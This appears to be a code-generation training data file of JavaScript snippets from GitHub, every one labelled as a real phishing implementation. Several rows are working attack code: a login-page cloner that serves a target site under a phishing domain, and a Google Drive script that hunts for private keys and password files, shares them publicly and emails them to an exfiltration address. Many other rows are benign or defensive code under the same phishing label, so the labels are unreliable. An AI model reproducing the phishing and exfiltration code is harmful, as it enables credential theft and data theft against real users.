replaceSrc = pageSource.replace('href="/', "href=\"" + baseURL+ '/');
replaceSrc = replaceSrc.replace('src="/', "src=\"" + baseURL+ '/');
replaceSrc = replaceSrc.replace('<head>', '<head><base href="' + phishDomain + '">');
return replaceSrc;
}
function createCORSRequest(method, url) {
var xhr = new XMLHttpRequest();
if ("withCredentials" in xhr) {
xhr.open(method, url, true);
} else if (typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open(method, url);
} else {
xhr = null;
}
return xhr;
}
function makeCorsRequest(baseURL, phishDomain) {
var url = 'https://cors-anywhere.herokuapp.com/' + baseURL;
var xhr = createCORSRequest('GET', url);
if (!xhr) {
return;
}
xhr.onload = function() {
var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain)
document.open();
document.write(pageSourceStr);
document.close();
};
xhr.send();
}
makeCorsRequest(page_src, phishing_url);
window.history.pushState("", "Login", "/login");
|
Javascript
|
infosec-au/phishJS
| 2025-05-22T22:01:02.254000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
const { Builder, By, until, Capabilities } = require("selenium-webdriver")
const chrome = require("selenium-webdriver/chrome")
const url = require("url")
const fs = require("fs")
const crypto = require("crypto")
const request = require("request")
const path = require("path")
const FormData = require("form-data")
const proxy = require("selenium-webdriver/proxy")
const proxyChain = require("proxy-chain")
require('console-stamp')(console, {
format: ':date(yyyy/mm/dd HH:MM:ss.l)'
})
require("dotenv").config()
const extensionId = "caacbgbklghmpodbdafajbgdnegacfmo"
const CRX_URL = `https://clients2.google.com/service/update2/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64`
const USER_AGENT =
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
const USER = process.env.APP_USER || ""
const PASSWORD = process.env.APP_PASS || ""
const ALLOW_DEBUG = !!process.env.DEBUG?.length || false
const EXTENSION_FILENAME = "app.crx"
const PROXY = process.env.PROXY || undefined
console.log("-> Starting...")
console.log("-> User:", USER)
console.log("-> Pass:", PASSWORD)
console.log("-> Proxy:", PROXY)
console.log("-> Debug:", ALLOW_DEBUG)
if (!USER || !PASSWORD) {
console.error("Please set APP_USER and APP_PASS env variables")
process.exit()
}
if (ALLOW_DEBUG) {
console.log(
"-> Debugging is enabled! This will generate a screenshot and console logs on error!"
)
}
async function downloadExtension(extensionId) {
const url = CRX_URL.replace(extensionId, extensionId)
const headers = { "User-Agent": USER_AGENT }
console.log("-> Downloading extension from:", url)
// if file exists and modify time is less than 1 day, skip download
if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) {
console.log("-> Extension already downloaded! skip download...")
return
}
return new
|
Javascript
|
web3bothub/gradient-bot
| 2025-05-22T22:01:02.390000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
const SCALES = { URGENCY: 5, CONFRIM: 6 };
const TOTALSCALE = 20;
const THRESH = 0.33;
function emailCheck(email) {
let scale = 0;
let idx = email.lastIndexOf("@");
id = email.slice(0, idx);
dmn = email.slice(idx + 1);
len1 = id.length;
len2 = dmn.length;
// Check Email ID for Number Count >= 3
idNums = id.replace(/\D/g, "");
if (idNums && idNums.length >= 3) scale += 2;
// Check Email Domain for Number Count > 0
dmnNums = dmn.replace(/\D/g, "");
if (dmnNums && dmnNums.length > 0) scale += 2;
// Check Email Domain for Common Domain
let found = DOMAINS.find(d => d === dmn);
if (!found) scale += 1;
return scale;
}
function URLcheck(body) {
url = body.match(
/[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)/
);
if (url) return 2;
return 0;
}
function greetingCheck(greeting) {
let scale = 0;
for (i = 0; i < 3; i++) {
let found = GREETINGS.find(greet => greeting[i] === greet);
if (found) scale += 1;
if (scale > 1) return 2;
}
return scale;
}
function urgencyCheck(word) {
let found = URGENCY_WORDS.find(w => w === word);
if (found) return 5 / 3;
return 0;
}
function confirmCheck(word) {
let found = CONFIRMING_WORDS.find(w => w === word);
if (found) return 2;
return 0;
}
function dictionaryCheck(body) {
body = body
.replace(/[.,'\/#!$%\^&\*;:{}=\-_`~()]/g, "")
.replace(/\r?\n|\r/g, " "); // Remove special chars
let words = body.split(" ");
words = words.filter(w => Boolean(w)); //Remove falsey values
let greeting = words.splice(0, 3);
let grtScale = greetingCheck(greeting);
let urgScale = 0;
let cfmScale = 0;
words.forEach(word => {
if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word);
if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word);
});
return { grtScale, urgScale, cfmScale };
}
function phishCheck(email, body) {
let eScale = emailCheck(email);
let urlScale = URLcheck(body);
let dictScale = dic
|
Javascript
|
PhishersOfMen/Assn5-Phishing-SQLI
| 2025-05-22T22:01:02.523000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
#!/usr/bin/env node
const fs = require('fs');
const debug = require('debug')('fuzz:main');
const Promise = require('bluebird');
const program = require('commander');
const request = require('request');
const libssdeep = require('ssdeep');
const csv = require('csv');
const ProgressBar = require('progress');
const CONF = require('./config');
const { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('./lib/utils');
const { DomainFuzz, DomainDict, DomainThread } = require('./lib');
const fuzz = (opts, domains, worker) => {
const total = domains.length;
const bar = new ProgressBar('Running [:bar] :percent :etas', {
complete: '=',
incomplete: ' ',
width: 50,
total,
});
Promise
.map(domains, (domain) => {
bar.tick(1);
return worker.run(domain);
}, { concurrency: opts.concurrency })
.then((result) => {
if (opts.option_output) {
let data;
if (opts.option_format === 'JSON') {
data = JSON.stringify(result, null, 4);
fs.appendFile(opts.option_output, data, 'utf8', (err) => {
if (err) printError(err.message);
});
} else if (opts.option_format === 'CSV') {
data = [];
const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score';
data.push(columns.split(','));
for (const domain of result) {
data.push(columns.split(',').map(_ => domain[_]));
}
csv.stringify(data, (parseErr, res) => {
fs.appendFile(this.option_output, res, 'utf8', (err) => {
if (err) printError(err.message);
});
});
}
}
for (const domain of result) {
printResult(domain);
}
})
.catch(err => printError(err.message));
};
const main = () => {
const opts = program
.version(CONF.version)
.usage('[options] DOMAIN')
.description(`Find similar-loo
|
Javascript
|
monkeym4ster/DomainFuzz
| 2025-05-22T22:01:02.651000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
const fs = require("fs");
// load puppeteer
const puppeteer = require('puppeteer');
const window_height = 768;
const window_width = 1366;
const studio_url = "https://studio.youtube.com/";
// directory contains the videos you want to upload
const upload_file_directory = "your video directory";
// change user data directory to your directory
const chrome_user_data_directory = "C:\\Users\\user\\AppData\\Local\\Chromium\\User Data";
const title_prefix = "video title prefix ";
const video_description = "";
const DEFAULT_ARGS = [
'--disable-background-networking',
'--enable-features=NetworkService,NetworkServiceInProcess',
'--disable-background-timer-throttling',
'--disable-backgrounding-occluded-windows',
'--disable-breakpad',
'--disable-client-side-phishing-detection',
'--disable-component-extensions-with-background-pages',
'--disable-default-apps',
'--disable-dev-shm-usage',
'--disable-extensions',
// BlinkGenPropertyTrees disabled due to crbug.com/937609
'--disable-features=TranslateUI,BlinkGenPropertyTrees',
'--disable-hang-monitor',
'--disable-ipc-flooding-protection',
'--disable-popup-blocking',
'--disable-prompt-on-repost',
'--disable-renderer-backgrounding',
'--disable-sync',
'--force-color-profile=srgb',
'--metrics-recording-only',
'--no-first-run',
'--enable-automation',
'--password-store=basic',
'--use-mock-keychain',
];
let files = [];
fs.readdir(upload_file_directory, function (err, temp_files) {
if (err) {
console.log('Something went wrong...');
return console.error(err);
}
for (let i = 0; i < temp_files.length; i++) {
files.push(temp_files[i]);
}
});
try {
(async () => {
const browser = await puppeteer.launch(
{
'headless': false, // have window
executablePath: null,
userDataDir: chrome_user_data_directory,
ignoreDefaultArgs:
|
Javascript
|
last2win/youtube-upload-multi-videos
| 2025-05-22T22:01:02.782000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
import warning from './station.svg'
import terra from './terra.svg'
import './fonts.css'
import './App.css'
const SAFE_PAGE = 'https://station.money'
function App() {
if (!document.referrer || document.referrer === window.location.href) {
//window.location.href = SAFE_PAGE
}
if (document.referrer) {
const { hostname } = new URL(document.referrer)
if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) {
return (
<div className='app__terra'>
<img src={terra} alt='Terra logo' />
<h2>WARNING</h2>
<p>
<span className='url'>{hostname}</span> is currently
unavailable. <br /> Please visit{' '}
<span className='url'>
<a href='https://twitter.com/terra_money'>
twitter.com/terra_money
</a>
</span>{' '}
for updates.
</p>
</div>
)
}
}
return (
<div className='App'>
<img src={warning} alt='warning' />
<h2>PHISHING ALERT</h2>
<p>
You are trying to visit <span className='url'>{document.referrer}</span>
<br />
which is a known scam website.
</p>
<span
onClick={() => {
window.location.href = SAFE_PAGE
}}
className='button__main'
>
Go back to safety
</span>
{/*
<a
href={document.referrer}
>
Visit anyway
</a>
*/}
</div>
)
}
export default App
|
Javascript
|
terra-money/scam-alert-web
| 2025-05-22T22:01:02.912000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
const fs = require('fs')
const fsExtra = require('fs-extra')
const rmRf = require('rimraf')
const Streams = require('mississippi')
const bind = require('ap').partial
const async = require('./async')
const Browserify = require('browserify')
const watchify = require('watchify')
const sassStream = require('sass-css-stream')
start(function(err){
if (err) throw err
console.log('end')
})
function start(cb){
async.series({
clean,
build,
}, cb)
}
function clean(cb){
fsExtra.remove('./dist/', cb)
}
function build(cb){
async.parallel({
buildJs,
buildCss,
buildStatic,
}, cb)
}
function buildJs(cb) {
var browserify = Browserify({
entries: ['./src/js/index.js'],
cache: {},
packageCache: {},
// plugin: [watchify],
})
browserify.on('update', bundle)
async.series({
buildJsPrep: bind(fsExtra.mkdirs, './dist/js'),
buildJsStart: start,
}, cb)
function start(cb){
var firstBundle = bundle()
Streams.finished(firstBundle, cb)
}
function bundle() {
console.log('bundle')
return Streams.pipeline(
browserify.bundle(),
fs.createWriteStream('./dist/js/bundle.js')
)
}
}
function buildCss(cb) {
async.series({
buildCssPrep: bind(fsExtra.mkdirs, './dist/css'),
buildCssStart: start,
}, cb)
function start(cb) {
var pipeline = Streams.pipeline(
fs.createReadStream( './src/css/index.scss' ),
sassStream( './src/css/index.scss' ),
fs.createWriteStream( './dist/css/bundle.css' )
)
Streams.finished(pipeline, cb)
}
}
function buildStatic(cb) {
async.parallel({
imgs: bind(fsExtra.copy, './src/img/', './dist/img/'),
faviconAndroid: bind(fsExtra.copy, './src/manifest.json', './dist/manifest.json'),
faviconIE: bind(fsExtra.copy, './src/browserconfig.xml', './dist/browserconfig.xml'),
fonts: bind(fsExtra.copy, './src/fonts/', './dist/fonts/'),
index: bind(fsExtra.copy, './src/index.html'
|
Javascript
|
409H/landing
| 2025-05-22T22:01:03.059000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
// Created by Greg Carson @ Feb 2017
// ---------------------------------------
// Play nice and use for security training
// and testing.
function drivePassSearch() {
// This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context.
// This can be disabled for Google Apps for Business users:
// https://support.google.com/a/answer/60781?hl=en
// Personal users shit out of luck? Not sure haven't looked into it.
var folder = DriveApp.createFolder('Evil Folder');
folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);
// Construct malicious search query on drive. Look for PDFs? DOC/XLS files? If you are looking for an extension use 'title contains'
// If you want to search through content for a keyword use 'fullText contains' instead
// You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image/' or mimeType contains 'video/')'
// Not aware of case sensitivity or ability to perform regular expressions
// Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit
// or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera
var files = DriveApp.searchFiles(
'modifiedDate > "2013-02-28" and title contains "SEARCHTERMHERE"');
while (files.hasNext()) {
var file = files.next();
Logger.log(file.getDownloadUrl());
Logger.log(file.getUrl());
Logger.log(file.getName());
var name = file.getName();
file.makeCopy(name,folder);
Logger.log(file.getDownloadUrl());
Logger.log(file.getUrl());
}
// Write Logger data to body of email and send to specified recipient
// Sender address is the current active user
Logger.log(folder.getUrl());
var recipient = "RECPIENT-EXFIL-EMAIL-ADDRESS-HERE";
var subject = 'Google Drive Query - KDBX';
var body = Logger.getLog();
MailApp.sendEmail(recipient, subj
|
Javascript
|
gregkcarson/GoogleAppScriptSE
| 2025-05-22T22:01:03.220000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
const express = require("express");
const app = express();
const http = require("http");
const server = http.createServer(app);
const puppeteer = require('puppeteer');
const port = 9001;
var browser;
app.use(express.json())
app.post('/bot/url', function(req, res) {
res.setHeader('Content-Type', 'application/json');
console.log(req.body);
let url = req.body.url
console.log(url);
startBot(url)
.then(() => {
res.send({
message: 'success',
data: req.body
})
})
.catch((err) => {
res.send({
message: 'failed',
error: err
})
})
})
async function startBot(url) {
console.log(browser);
if(typeof browser !== 'undefined'){
await browser.close()
}
const minimal_args = [
'--autoplay-policy=user-gesture-required',
'--disable-background-networking',
'--disable-background-timer-throttling',
'--disable-backgrounding-occluded-windows',
'--disable-breakpad',
'--disable-client-side-phishing-detection',
'--disable-component-update',
'--disable-default-apps',
'--disable-dev-shm-usage',
'--disable-domain-reliability',
'--disable-extensions',
'--disable-features=AudioServiceOutOfProcess',
'--disable-hang-monitor',
'--disable-ipc-flooding-protection',
'--disable-notifications',
'--disable-offer-store-unmasked-wallet-cards',
'--disable-popup-blocking',
'--disable-print-preview',
'--disable-prompt-on-repost',
'--disable-renderer-backgrounding',
'--disable-setuid-sandbox',
'--disable-speech-api',
'--disable-sync',
'--hide-scrollbars',
'--ignore-gpu-blacklist',
'--metrics-recording-only',
'--mute-audio',
'--no-default-browser-check',
'--no-first-run',
'--no-pings',
'--no-sandbox',
'--no-zygote',
'--password-store=basic',
'--use-gl=swiftshader',
'--use-mock-keychain',
];
console.log("Launching Headless Browser::::::::::::");
browser = await puppeteer.launch({
|
Javascript
|
arunjohn96/webndi
| 2025-05-22T22:01:03.383000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
import React from 'react';
import {
Route,
Switch
} from 'react-router-dom';
const isBrowser = typeof window !== "undefined" && typeof window.document !== "undefined";
const dummy = () => {};
const HelpTextPage = isBrowser? React.lazy(() => import("./components/helpText")): dummy;
const WebhookPage = isBrowser? React.lazy(() => import("./pages/guild_dashboard/server_view")): dummy;
const ManagerRootPage = isBrowser? React.lazy(() => import("./pages/emote_manager/manager_root")): dummy;
const LoginPage = isBrowser? React.lazy(() => import("./pages/login")): dummy;
const InvitePage = isBrowser? React.lazy(() => import("./pages/invite")): dummy;
const PrivacyPolicy = isBrowser? React.lazy(() => import("./pages/policy")): dummy;
const GuildCreatorPage = isBrowser? React.lazy(() => import("./pages/guild_builder/guild_builder")): dummy;
const GuildSelectorPage = isBrowser? React.lazy(() => import("./pages/guild_builder/guild_selector")): dummy;
const GuildStatusPage = isBrowser? React.lazy(() => import("./pages/guild_builder/guild_status")): dummy;
const LicensePage = isBrowser? React.lazy(() => import("./pages/licenses")): dummy;
const CommandPage = isBrowser? React.lazy(() => import("./pages/commands")): dummy;
const BotAddedPage = isBrowser? React.lazy(() => import("./pages/bot_added")): dummy;
const PremiumPage = isBrowser? React.lazy(() => import("./pages/premium")): dummy;
const PublicPackSearchPage = isBrowser? React.lazy(() => import("./pages/public_packs/search")): dummy;
const PublicPackPage = isBrowser? React.lazy(() => import("./pages/public_packs/view")): dummy;
const PhishingPage = isBrowser? React.lazy(() => import("./pages/phishing")): dummy;
const TermsPage = isBrowser? React.lazy(() => import("./pages/terms")): dummy;
export const FullRouter = ({loggedIn, HomePage}) => {
return (
<React.Suspense fallback={<div>Loading Page...</div>}>
{!loggedIn && <LoggedOutRouter HomePage={HomePage}/>}
{loggedIn && <LoggedInRouter HomePage={H
|
Javascript
|
NQN-Discord/NQNFrontend
| 2025-05-22T22:01:03.529000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
const maxConfigItems = 600
const maxPerType = 300
const includeOriginalConfigs = 0
const subLinks = [
"https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/trojan.txt",
"https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/ss.txt",
"https://raw.githubusercontent.com/coldwater-10/V2Hub/main/Split/Base64/shadowsocks",
"https://raw.githubusercontent.com/coldwater-10/V2Hub2/main/Split/Base64/vmess",
"https://raw.githubusercontent.com/NiREvil/vless/main/sub/freedom"
]
const cnfLinks = [
"https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/vmess.txt",
"https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/vmess_iran.txt",
"https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/trojan_iran.txt",
"https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/ss_iran.txt"
]
const cleanIPLink = "https://raw.githubusercontent.com/coldwater-10/clash_rules/main/List%20of%20clean%20IPs.txt"
const operatorList = ["AST", "HWB", "IRC", "MBT", "MCI", "MKB", "PRS", "RTL", "SHT", "ZTL", "PIS", "DAT", "SAB", "ASR", "FAN", "ZTL", "SFR", "DID", "LAY", "MAH", "TAK", "PET", "AND", "RES", "AFR", "ARA", "SAM", "APT", "ALL", "PLUS", "TEST", "ENG", "FA", "IPV6", "IRCF", "ANTY"]
const addressList = ["discord.com", "cloudflare.com", "nginx.com", "cdnjs.com", "vimeo.com", "networksolutions.com"]
const fpList = ["chrome", "chrome", "chrome", "firefox", "safari", "edge", "ios", "android", "360", "qq", "random", "random"]
const alpnList = ["http/1.1", "h2,http/1.1", "h2,http/1.1", "h2,http/1.1"]
var cleanIPs = []
export default {
async fetch(request) {
var url = new URL(request.url)
var pathParts = url.pathname.replace(/^\/|\/$/g, "").split("/")
var type = pathParts[0].toLowerCase()
if (["sub", "clash"].includes(type)) {
if (pathParts[1] !== undefined) {
var operator = pathParts[1].toUppe
|
Javascript
|
NiREvil/workers-cloudflare
| 2025-05-22T22:01:03.663000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/* eslint-env node */
module.exports = {
test_page: 'tests/index.html?hidepassed',
disable_watching: true,
launch_in_ci: [
'Chrome',
],
launch_in_dev: [
'Chrome',
],
browser_args: {
Chrome: [
'--headless',
'--no-sandbox',
'--disable-gpu',
'--disable-software-rasterizer',
'--mute-audio',
'--remote-debugging-port=0',
'--window-size=1440,900',
// https://github.com/GoogleChrome/puppeteer/blob/v1.11.0/lib/Launcher.js#L36
'--disable-background-networking',
'--disable-background-timer-throttling',
'--disable-backgrounding-occluded-windows',
'--disable-breakpad',
'--disable-client-side-phishing-detection',
'--disable-default-apps',
'--disable-dev-shm-usage',
'--disable-extensions',
'--disable-features=site-per-process',
'--disable-hang-monitor',
'--disable-ipc-flooding-protection',
'--disable-popup-blocking',
'--disable-prompt-on-repost',
'--disable-renderer-backgrounding',
'--disable-sync',
'--disable-translate',
'--enable-automation',
'--metrics-recording-only',
'--no-first-run',
'--password-store=basic',
'--safebrowsing-disable-auto-update',
'--use-mock-keychain',
],
},
};
|
Javascript
|
bitcoin-black-bcb/bcb-wallet
| 2025-05-22T22:01:03.841000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
//'use strict';
function appendMirr(data) {
mirr = JSON.parse(data)[0];
if(mirr.url) {
var altelem = document.createElement("h1");
altelem = '<br/><a style="background: #2d2d2d !important; color:yellow !important; text-align: center !important; position: fixed !important; width: 100% !important; line-height: 1.5 !important; z-index: 9999 !important; display: block !important; visibility: visible !important; opacity: 1 !important;" href="'+mirr.url+'">Try this working mirror instead</a>';
var element = document.getElementById('mainwarn');
element.innerHTML += altelem;
}
}
function newMirr(site, success) {
if(site) {
getAjax('https://onion.live/api/v2/public/mirrors?site='+site+'&max=1', '', success);
}
}
function handleResponse(message) {
console.log(`Message from the background script: ${message.response}`);
}
function handleError(error) {
console.log(`Error: ${error}`);
}
function getAjax(url, data, success) {
var params = typeof data == 'string' ? data : Object.keys(data).map(
function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }
).join('&');
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
xhr.open('GET', url);
xhr.onreadystatechange = function() {
if (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }
if (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); }
};
xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(params);
return xhr;
}
function checkWorking(url, site) {
var MrChecker = new XMLHttpRequest(),
CheckThisUrl = "http://"+url+"/";
MrChecker.open('get', CheckThisUrl, true);
MrChecker.onreadystatechange = checkReadyState;
function checkReadyState() {
if (MrChecker.readyState === 4) {
if (MrChecker.status >= 200 || MrChecker.status < 304) {
var element = document.getElementById('mainwarn');
if(element) {
|
Javascript
|
OnionDotLive/onionliveplugin
| 2025-05-22T22:01:04.017000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/*
####################################################################
# s'abonner sur ma chaine youtube pour avoir plus de code phishing #
# et hacking,il me donne le courage de faire les codes phishing #
# #
# subscribe on my youtube channel to have more phishing code #
# and hacking, it gives me the courage to do the phishing codes #
# #
# ||~~ BY ~~ hakanonymos ~~|| #
# #
# #
# #
# skype et email : hakanonymos@hotmail.com #
####################################################################
*/
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling votre site de redrection 10000 = 10 seconde
timerRedirect = setInterval("location.href='https://panafricaine.com/ransomware/'",300 0000); //temps de redirection
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
|
Javascript
|
hakanonymos/chromeKeylogger
| 2025-05-22T22:01:04.152000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
import { useEffect, useState } from "react";
import Navbar from "./components/Navbar/Navbar";
import Breadcrumbs from "./components/Breadcrumbs/Breadcrumbs";
import ProductDetails from "./components/ProductDetails/ProductDetails";
import ProductCarousel from "./components/ProductCarousel/ProductCarousel";
import Swal from "sweetalert2";
import "./App.css";
const App = () => {
const [darkMode, setDarkMode] = useState(false);
const toggleDarkMode = () => setDarkMode(prevState => !prevState);
useEffect(() => {
Swal.fire({
title: "¡Atención!",
text: "Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan.",
icon: "warning",
confirmButtonText: "¡Entendido!",
confirmButtonColor: "#3484fa",
backdrop: "rgba(0, 0, 0, 0.8)",
});
}, []);
return (
<>
<header className={darkMode ? "dark-mode" : ""}>
<Navbar darkMode={darkMode} toggleDarkMode={toggleDarkMode} />
</header>
<main className={darkMode ? "dark-mode" : ""}>
<Breadcrumbs />
<ProductDetails />
<ProductCarousel />
</main>
<footer className={darkMode ? "dark-mode" : ""}>
Desarrollado por
<a
href="https://gastonperez.ar/"
target="_blank"
rel="noreferrer"
>
Gastón Pérez
</a>
<p>
ATENCIÓN: Esta web se trata de un
<a
href="https://github.com/goncy/mercadolibre-details-challenge"
target="_blank"
rel="noreferrer"
>
challenge
</a>
, no es un intento de phishing hacia los usuarios que la
visitan.
</p>
</footer>
</>
);
};
export default App;
|
Javascript
|
GastonPerez97/mercadolibre-details-challenge
| 2025-05-22T22:01:04.271000
|
training
|
null | null | null | null | null | null | 20250522_220104
| null |